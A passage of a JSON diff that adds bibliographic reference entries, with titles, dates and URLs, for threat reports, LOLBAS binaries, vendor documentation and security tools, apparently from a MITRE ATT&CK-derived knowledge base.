"RISKIQ. (2022, March 15). RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure. Retrieved July 29, 2022.", + "meta": { + "date_accessed": "2022-07-29T00:00:00Z", + "date_published": "2022-03-15T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/" + ], + "source": "MITRE", + "title": "RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure" + }, + "related": [], + "uuid": "a4a3fd3d-1c13-40e5-b462-fa69a1861986", + "value": "httrack_unhcr" + }, + { + "description": "US-CERT. (n.d.). Risks of Default Passwords on the Internet. Retrieved April 12, 2019.", + "meta": { + "date_accessed": "2019-04-12T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA13-175A" + ], + "source": "MITRE", + "title": "Risks of Default Passwords on the Internet" + }, + "related": [], + "uuid": "0c365c3f-3aa7-4c63-b96e-7716b95db049", + "value": "US-CERT Alert TA13-175A Risks of Default Passwords on the Internet" + }, + { + "description": "Dirk-jan Mollema. (2022, January 31). ROADtools. Retrieved January 31, 2022.", + "meta": { + "date_accessed": "2022-01-31T00:00:00Z", + "date_published": "2022-01-31T00:00:00Z", + "refs": [ + "https://github.com/dirkjanm/ROADtools" + ], + "source": "MITRE", + "title": "ROADtools" + }, + "related": [], + "uuid": "90c592dc-2c9d-401a-96ab-b539f7522956", + "value": "ROADtools Github" + }, + { + "description": "HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August 24, 2020.", + "meta": { + "date_accessed": "2020-08-24T00:00:00Z", + "date_published": "2017-01-17T00:00:00Z", + "refs": [ + "http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/" + ], + "source": "MITRE", + "title": "Roasting AS-REPs" + }, + "related": [], + "uuid": "bfb01fbf-4dc0-4943-8a21-457f28f4b01f", + "value": "Harmj0y Roasting AS-REPs Jan 2017" + }, + { + "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.", + "meta": { + "date_accessed": "2019-04-24T00:00:00Z", + "date_published": "2019-03-15T00:00:00Z", + "refs": [ + "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" + ], + "source": "MITRE", + "title": "Rocke Evolves Its Arsenal With a New Malware Family Written in Golang" + }, + "related": [], + "uuid": "31051c8a-b523-4b8e-b834-2168c59e783b", + "value": "Anomali Rocke March 2019" + }, + { + "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.", + "meta": { + "date_accessed": "2020-05-26T00:00:00Z", + "date_published": "2018-08-30T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Rocke: The Champion of Monero Miners" + }, + "related": [], + "uuid": "bff0ee40-e583-4f73-a013-4669ca576904", + "value": "Talos Rocke August 2018" + }, + { + "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.", + "meta": { + "date_accessed": "2018-03-16T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ], + "source": "MITRE", + "title": "ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES" + }, + "related": [], + "uuid": "71da7d4c-f1f8-4f5c-a609-78a414851baf", + "value": "Check Point Rocket Kitten" + }, + { + "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.", + "meta": { + "date_accessed": "2020-05-21T00:00:00Z", + "date_published": "2018-11-08T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2018/11/08/rokrat-analysis/" + ], + "source": "MITRE", + "title": "RokRat Analysis" + }, + "related": [], + "uuid": "bcad3b27-858f-4c1d-a24c-dbc4dcee3cdc", + "value": "NCCGroup RokRat Nov 2018" + }, + { + "description": "Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.", + "meta": { + "date_accessed": "2018-05-21T00:00:00Z", + "date_published": "2017-11-28T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html" + ], + "source": "MITRE", + "title": "ROKRAT Reloaded" + }, + "related": [], + "uuid": "116f6565-d36d-4d01-9a97-a40cf589afa9", + "value": "Talos ROKRAT 2" + }, + { + "description": "Kubernetes. (n.d.). Role Based Access Control Good Practices. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/" + ], + "source": "MITRE", + "title": "Role Based Access Control Good Practices" + }, + "related": [], + "uuid": "37c0e0e1-cc4d-5a93-b8a0-224f031b7324", + "value": "Kubernetes RBAC" + }, + { + "description": "Google Cloud. (n.d.). Roles for service account authentication. Retrieved July 10, 2023.", + "meta": { + "date_accessed": "2023-07-10T00:00:00Z", + "refs": [ + "https://cloud.google.com/iam/docs/service-account-permissions" + ], + "source": "MITRE", + "title": "Roles for service account authentication" + }, + "related": [], + "uuid": "525a8afc-64e9-5cc3-9c56-95da9811da0d", + "value": "Google Cloud Service Account Authentication Roles" + }, + { + "description": "Joe Tidy. (2022, March 30). Ronin Network: What a $600m hack says about the state of crypto. Retrieved August 18, 2023.", + "meta": { + "date_accessed": "2023-08-18T00:00:00Z", + "date_published": "2022-03-30T00:00:00Z", + "refs": [ + "https://www.bbc.com/news/technology-60933174" + ], + "source": "MITRE", + "title": "Ronin Network: What a $600m hack says about the state of crypto" + }, + "related": [], + "uuid": "8e162e39-a58f-5ba0-9a8e-101d4cfa324c", + "value": "BBC-Ronin" + }, + { + "description": "Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.", + "meta": { + "date_accessed": "2017-02-20T00:00:00Z", + "date_published": "2016-12-06T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Root_certificate" + ], + "source": "MITRE", + "title": "Root certificate" + }, + "related": [], + "uuid": "68b9ccbb-906e-4f06-b5bd-3969723c3616", + "value": "Wikipedia Root Certificate" + }, + { + "description": "Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.", + "meta": { + "date_accessed": "2016-06-02T00:00:00Z", + "date_published": "2016-06-01T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Rootkit" + ], + "source": "MITRE", + "title": "Rootkit" + }, + "related": [], + "uuid": "7e877b6b-9873-48e2-b138-e02dcb5268ca", + "value": "Wikipedia Rootkit" + }, + { + "description": "Rascagnères, P.. (2016, October 27). Rootkit analysis: Use case on HideDRV. Retrieved March 9, 2017.", + "meta": { + "date_accessed": "2017-03-09T00:00:00Z", + "date_published": "2016-10-27T00:00:00Z", + "refs": [ + "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" + ], + "source": "MITRE", + "title": "Rootkit analysis: Use case on HideDRV" + }, + "related": [], + "uuid": "c383811d-c036-4fe7-add8-b4d4f73b3ce4", + "value": "Sekoia HideDRV Oct 2016" + }, + { + "description": "Alex Turing, Hui Wang. (2021, April 28). RotaJakiro: A long live secret backdoor with 0 VT detection. Retrieved June 14, 2023.", + "meta": { + "date_accessed": "2023-06-14T00:00:00Z", + "date_published": "2021-04-28T00:00:00Z", + "refs": [ + "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/" + ], + "source": "MITRE", + "title": "RotaJakiro: A long live secret backdoor with 0 VT detection" + }, + "related": [], + "uuid": "7a9c53dd-2c0e-5452-9ee2-01531fbf8ba8", + "value": "RotaJakiro 2021 netlab360 analysis" + }, + { + "description": "Alex Turing. (2021, May 6). RotaJakiro, the Linux version of the OceanLotus. Retrieved June 14, 2023.", + "meta": { + "date_accessed": "2023-06-14T00:00:00Z", + "date_published": "2021-05-06T00:00:00Z", + "refs": [ + "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/" + ], + "source": "MITRE", + "title": "RotaJakiro, the Linux version of the OceanLotus" + }, + "related": [], + "uuid": "20967c9b-5bb6-5cdd-9466-2c9efd9ab98c", + "value": "netlab360 rotajakiro vs oceanlotus" + }, + { + "description": "Microsoft. (n.d.). Route. Retrieved April 17, 2016.", + "meta": { + "date_accessed": "2016-04-17T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb490991.aspx" + ], + "source": "MITRE", + "title": "Route" + }, + "related": [], + "uuid": "0e483ec8-af40-4139-9711-53b999e069ee", + "value": "TechNet Route" + }, + { + "description": "Iacono, L. and Green, S. (2023, February 13). Royal Ransomware Deep Dive. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2023-02-13T00:00:00Z", + "refs": [ + "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive" + ], + "source": "MITRE", + "title": "Royal Ransomware Deep Dive" + }, + "related": [], + "uuid": "dcdcc965-56d0-58e6-996b-d8bd40916745", + "value": "Kroll Royal Deep Dive February 2023" + }, + { + "description": "Morales, N. et al. (2023, February 20). Royal Ransomware Expands Attacks by Targeting Linux ESXi Servers. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2023-02-20T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html" + ], + "source": "MITRE", + "title": "Royal Ransomware Expands Attacks by Targeting Linux ESXi Servers" + }, + "related": [], + "uuid": "e5bb846f-d11f-580c-b96a-9de4ba5eaed6", + "value": "Trend Micro Royal Linux ESXi February 2023" + }, + { + "description": "Cybereason Global SOC and Cybereason Security Research Teams. (2022, December 14). Royal Rumble: Analysis of Royal Ransomware. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2022-12-14T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/royal-ransomware-analysis" + ], + "source": "MITRE", + "title": "Royal Rumble: Analysis of Royal Ransomware" + }, + "related": [], + "uuid": "28aef64e-20d3-5227-a3c9-e657c6e2d07e", + "value": "Cybereason Royal December 2022" + }, + { + "description": "LOLBAS. (2018, May 25). Rpcping.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/" + ], + "source": "Tidal Cyber", + "title": "Rpcping.exe" + }, + "related": [], + "uuid": "dc15a187-4de7-422e-a507-223e89e317b1", + "value": "Rpcping.exe - LOLBAS Project" + }, + { + "description": "L. O'Donnell. (2019, March 3). RSAC 2019: New Operation Sharpshooter Data Reveals Higher Complexity, Scope. Retrieved September 26, 2022.", + "meta": { + "date_accessed": "2022-09-26T00:00:00Z", + "date_published": "2019-03-03T00:00:00Z", + "refs": [ + "https://threatpost.com/sharpshooter-complexity-scope/142359/" + ], + "source": "MITRE", + "title": "RSAC 2019: New Operation Sharpshooter Data Reveals Higher Complexity, Scope" + }, + "related": [], + "uuid": "2361b5b1-3a01-4d77-99c6-261f444a498e", + "value": "Threatpost New Op Sharpshooter Data March 2019" + }, + { + "description": "Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018.", + "meta": { + "date_accessed": "2018-09-24T00:00:00Z", + "date_published": "2011-06-07T00:00:00Z", + "refs": [ + "https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/" + ], + "source": "MITRE", + "title": "RSA confirms its tokens used in Lockheed hack" + }, + "related": [], + "uuid": "40564d23-b9ae-4bb3-8dd1-d6b01163a32d", + "value": "GCN RSA June 2011" + }, + { + "description": "RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.", + "meta": { + "date_accessed": "2016-01-14T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf" + ], + "source": "MITRE", + "title": "RSA Incident Response Emerging Threat Profile: Shell Crew" + }, + "related": [], + "uuid": "6872a6d3-c4ab-40cf-82b7-5c5c8e077189", + "value": "RSA Shell Crew" + }, + { + "description": "Harmj0y. (n.d.). Rubeus. Retrieved March 29, 2023.", + "meta": { + "date_accessed": "2023-03-29T00:00:00Z", + "refs": [ + "https://github.com/GhostPack/Rubeus" + ], + "source": "MITRE", + "title": "Rubeus" + }, + "related": [], + "uuid": "4bde7ce6-7fc6-5660-a8aa-745f19350ee1", + "value": "GitHub Rubeus March 2023" + }, + { + "description": "Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.", + "meta": { + "date_accessed": "2021-07-27T00:00:00Z", + "date_published": "2020-05-01T00:00:00Z", + "refs": [ + "https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/" + ], + "source": "MITRE", + "title": "Rule of the Week: Possible Malicious File Double Extension" + }, + "related": [], + "uuid": "14a99228-de84-4551-a6b5-9c6f1173f292", + "value": "SOCPrime DoubleExtension" + }, + { + "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.", + "meta": { + "date_accessed": "2019-02-04T00:00:00Z", + "date_published": "2016-08-18T00:00:00Z", + "refs": [ + "https://github.com/sensepost/ruler" + ], + "source": "MITRE", + "title": "Ruler: A tool to abuse Exchange services" + }, + "related": [], + "uuid": "aa0a1508-a872-4e69-bf20-d3c8202f18c1", + "value": "SensePost Ruler GitHub" + }, + { + "description": "Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.", + "meta": { + "date_accessed": "2021-06-07T00:00:00Z", + "date_published": "2018-12-12T00:00:00Z", + "refs": [ + "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154" + ], + "source": "MITRE", + "title": "Rule your inbox with Microsoft Cloud App Security" + }, + "related": [], + "uuid": "be0a1168-fa84-4742-a658-41a078b7f5fa", + "value": "Microsoft Cloud App Security" + }, + { + "description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "refs": [ + "http://msdn.microsoft.com/en-us/library/aa376977" + ], + "source": "MITRE", + "title": "Run and RunOnce Registry Keys" + }, + "related": [], + "uuid": "0d633a50-4afd-4479-898e-1a785f5637da", + "value": "Microsoft Run Key" + }, + { + "description": "Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.", + "meta": { + "date_accessed": "2021-10-01T00:00:00Z", + "date_published": "2016-08-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)" + ], + "source": "MITRE", + "title": "Runas" + }, + "related": [], + "uuid": "af05c12e-f9c6-421a-9a5d-0797c01ab2dc", + "value": "Microsoft RunAs" + }, + { + "description": "Microsoft TechNet. (n.d.). Runas. Retrieved April 21, 2017.", + "meta": { + "date_accessed": "2017-04-21T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb490994.aspx" + ], + "source": "MITRE", + "title": "Runas" + }, + "related": [], + "uuid": "8b4bdce9-da19-443f-88d2-11466e126c09", + "value": "Microsoft runas" + }, + { + "description": "Wikipedia. (2018, August 3). Run Command. Retrieved October 12, 2018.", + "meta": { + "date_accessed": "2018-10-12T00:00:00Z", + "date_published": "2018-08-03T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Run_command" + ], + "source": "MITRE", + "title": "Run Command" + }, + "related": [], + "uuid": "2fd66037-95dd-4819-afc7-00b7fd6f54fe", + "value": "Wikipedia Run Command" + }, + { + "description": "Prakash, T. (2017, June 21). Run commands on Windows system remotely using Winexe. Retrieved January 22, 2018.", + "meta": { + "date_accessed": "2018-01-22T00:00:00Z", + "date_published": "2017-06-21T00:00:00Z", + "refs": [ + "http://www.secpod.com/blog/winexe/" + ], + "source": "MITRE", + "title": "Run commands on Windows system remotely using Winexe" + }, + "related": [], + "uuid": "ca8ea354-44d4-4606-8b3e-1102b27f251c", + "value": "Secpod Winexe June 2017" + }, + { + "description": "LOLBAS. (2018, May 25). Rundll32.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rundll32/" + ], + "source": "Tidal Cyber", + "title": "Rundll32.exe" + }, + "related": [], + "uuid": "90aff246-ce27-4f21-96f9-38543718ab07", + "value": "Rundll32.exe - LOLBAS Project" + }, + { + "description": "Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.", + "meta": { + "date_accessed": "2021-08-23T00:00:00Z", + "refs": [ + "https://www.attackify.com/blog/rundll32_execution_order/" + ], + "source": "MITRE", + "title": "Rundll32.exe Obscurity" + }, + "related": [], + "uuid": "daa35853-eb46-4ef4-b543-a2c5157f96bf", + "value": "Attackify Rundll32.exe Obscurity" + }, + { + "description": "LOLBAS. (2022, December 13). Runexehelper.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-12-13T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/" + ], + "source": "Tidal Cyber", + "title": "Runexehelper.exe" + }, + "related": [], + "uuid": "86ff0379-2b73-4981-9f13-2b02b53bc90f", + "value": "Runexehelper.exe - LOLBAS Project" + }, + { + "description": "hoakley. (2018, May 22). Running at startup: when to use a Login Item or a LaunchAgent/LaunchDaemon. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "date_published": "2018-05-22T00:00:00Z", + "refs": [ + "https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/" + ], + "source": "MITRE", + "title": "Running at startup: when to use a Login Item or a LaunchAgent/LaunchDaemon" + }, + "related": [], + "uuid": "11ee6303-5103-4063-a765-659ead217c6c", + "value": "ELC Running at startup" + }, + { + "description": "Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.", + "meta": { + "date_accessed": "2021-07-26T00:00:00Z", + "date_published": "2020-08-21T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1" + ], + "source": "MITRE", + "title": "Running Remote Commands" + }, + "related": [], + "uuid": "24c526e1-7199-45ca-99b4-75e75c7041cd", + "value": "Powershell Remote Commands" + }, + { + "description": "LOLBAS. (2018, May 25). Runonce.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/" + ], + "source": "Tidal Cyber", + "title": "Runonce.exe" + }, + "related": [], + "uuid": "b97d4b16-ead2-4cc7-90e5-f8b05d84faf3", + "value": "Runonce.exe - LOLBAS Project" + }, + { + "description": "Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.", + "meta": { + "date_accessed": "2021-03-31T00:00:00Z", + "date_published": "2012-07-07T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html" + ], + "source": "MITRE", + "title": "Run-Path Dependent Libraries" + }, + "related": [], + "uuid": "e9e5cff5-836a-4b66-87d5-03a727c0f467", + "value": "Apple Developer Doco Archive Run-Path" + }, + { + "description": "LOLBAS. (2018, May 25). Runscripthelper.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/" + ], + "source": "Tidal Cyber", + "title": "Runscripthelper.exe" + }, + "related": [], + "uuid": "6d7151e3-685a-4dc7-a44d-aefae4f3db6a", + "value": "Runscripthelper.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2023, March 10). Run scripts in your VM by using Run Command. Retrieved March 13, 2023.", + "meta": { + "date_accessed": "2023-03-13T00:00:00Z", + "date_published": "2023-03-10T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview" + ], + "source": "MITRE", + "title": "Run scripts in your VM by using Run Command" + }, + "related": [], + "uuid": "4f2e6adb-6e3d-5f1f-b873-4b99797f2bfa", + "value": "Microsoft Run Command" + }, + { + "description": "Paganini, P. (2017, November 9). Russia-Linked APT28 group observed using DDE attack to deliver malware. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-11-09T00:00:00Z", + "refs": [ + "http://securityaffairs.co/wordpress/65318/hacking/dde-attack-apt28.html" + ], + "source": "MITRE", + "title": "Russia-Linked APT28 group observed using DDE attack to deliver malware" + }, + "related": [], + "uuid": "d5ab8075-334f-492c-8318-c691f210b984", + "value": "McAfee APT28 DDE2 Nov 2017" + }, + { + "description": "Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.", + "meta": { + "date_accessed": "2021-08-24T00:00:00Z", + "date_published": "2018-10-16T00:00:00Z", + "refs": [ + "https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html" + ], + "source": "MITRE", + "title": "Russia-linked APT group DustSquad targets diplomatic entities in Central Asia" + }, + "related": [], + "uuid": "0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6", + "value": "Security Affairs DustSquad Oct 2018" + }, + { + "description": "Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "date_published": "2018-10-18T00:00:00Z", + "refs": [ + "https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia" + ], + "source": "MITRE", + "title": "Russia-Linked Hackers Target Diplomatic Entities in Central Asia" + }, + "related": [], + "uuid": "659f86ef-7e90-42ff-87b7-2e289f9f6cc2", + "value": "SecurityWeek Nomadic Octopus Oct 2018" + }, + { + "description": "U.S. Federal Bureau of Investigation. (2024, February 27). Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations. Retrieved February 28, 2024.", + "meta": { + "date_accessed": "2024-02-28T00:00:00Z", + "date_published": "2024-02-27T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.ic3.gov/Media/News/2024/240227.pdf" + ], + "source": "Tidal Cyber", + "title": "Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations" + }, + "related": [], + "uuid": "962fb031-dfd1-43a7-8202-3a2231b0472b", + "value": "U.S. Federal Bureau of Investigation 2 27 2024" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, December 13). Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally. Retrieved December 14, 2023.", + "meta": { + "date_accessed": "2023-12-14T00:00:00Z", + "date_published": "2023-12-13T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a" + ], + "source": "Tidal Cyber", + "title": "Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally" + }, + "related": [], + "uuid": "5f66f864-58c2-4b41-8011-61f954e04b7e", + "value": "U.S. CISA SVR TeamCity Exploits December 2023" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, December 7). Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns. Retrieved December 14, 2023.", + "meta": { + "date_accessed": "2023-12-14T00:00:00Z", + "date_published": "2023-12-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a" + ], + "source": "Tidal Cyber", + "title": "Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns" + }, + "related": [], + "uuid": "3d53c154-8ced-4dbe-ab4e-db3bc15bfe4b", + "value": "U.S. CISA Star Blizzard December 2023" + }, + { + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.", + "meta": { + "date_accessed": "2020-08-25T00:00:00Z", + "date_published": "2020-08-01T00:00:00Z", + "refs": [ + "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF" + ], + "source": "MITRE", + "title": "Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware" + }, + "related": [], + "uuid": "d697a342-4100-4e6b-95b9-4ae3ba80924b", + "value": "NSA/FBI Drovorub August 2020" + }, + { + "description": "NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.", + "meta": { + "date_accessed": "2021-07-26T00:00:00Z", + "date_published": "2021-07-01T00:00:00Z", + "refs": [ + "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" + ], + "source": "MITRE, Tidal Cyber", + "title": "Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments" + }, + "related": [], + "uuid": "e70f0742-5f3e-4701-a46b-4a58c0281537", + "value": "Cybersecurity Advisory GRU Brute Force Campaign July 2021" + }, + { + "description": "Cimpanu, C.. (2017, March 29). Russian Hacker Pleads Guilty for Role in Infamous Linux Ebury Malware. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2017-03-29T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/" + ], + "source": "MITRE", + "title": "Russian Hacker Pleads Guilty for Role in Infamous Linux Ebury Malware" + }, + "related": [], + "uuid": "e5d69297-b0f3-4586-9eb7-d2922b3ee7bb", + "value": "BleepingComputer Ebury March 2017" + }, + { + "description": "Catalin Cimpanu. (2021, December 9). Russian hackers bypass 2FA by annoying victims with repeated push notifications. Retrieved March 31, 2022.", + "meta": { + "date_accessed": "2022-03-31T00:00:00Z", + "date_published": "2021-12-09T00:00:00Z", + "refs": [ + "https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/" + ], + "source": "MITRE", + "title": "Russian hackers bypass 2FA by annoying victims with repeated push notifications" + }, + "related": [], + "uuid": "ad2b0648-b657-4daa-9510-82375a252fc4", + "value": "Russian 2FA Push Annoyance - Cimpanu" + }, + { + "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.", + "meta": { + "date_accessed": "2020-06-16T00:00:00Z", + "date_published": "2019-01-23T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" + ], + "source": "MITRE", + "title": "Russian Language Malspam Pushing Redaman Banking Malware" + }, + "related": [], + "uuid": "433cd55a-f912-4d5a-aff6-92133d08267b", + "value": "Unit42 Redaman January 2019" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved March 16, 2022.", + "meta": { + "date_accessed": "2022-03-16T00:00:00Z", + "date_published": "2022-03-15T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a" + ], + "source": "MITRE", + "title": "Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability" + }, + "related": [], + "uuid": "fa03324e-c79c-422e-80f1-c270fd87d4e2", + "value": "CISA MFA PrintNightmare" + }, + { + "description": "Cyber Security Infrastructure Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved May 31, 2022.", + "meta": { + "date_accessed": "2022-05-31T00:00:00Z", + "date_published": "2022-03-15T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a" + ], + "source": "MITRE", + "title": "Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability" + }, + "related": [], + "uuid": "00c6ff88-6eeb-486d-ae69-dffd5aebafe6", + "value": "Russians Exploit Default MFA Protocol - CISA March 2022" + }, + { + "description": "CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022.", + "meta": { + "date_accessed": "2022-02-14T00:00:00Z", + "date_published": "2018-04-20T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/TA18-106A" + ], + "source": "MITRE", + "title": "Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices" + }, + "related": [], + "uuid": "26b520dc-5c68-40f4-82fb-366d27fc0c2f", + "value": "alert_TA18_106A" + 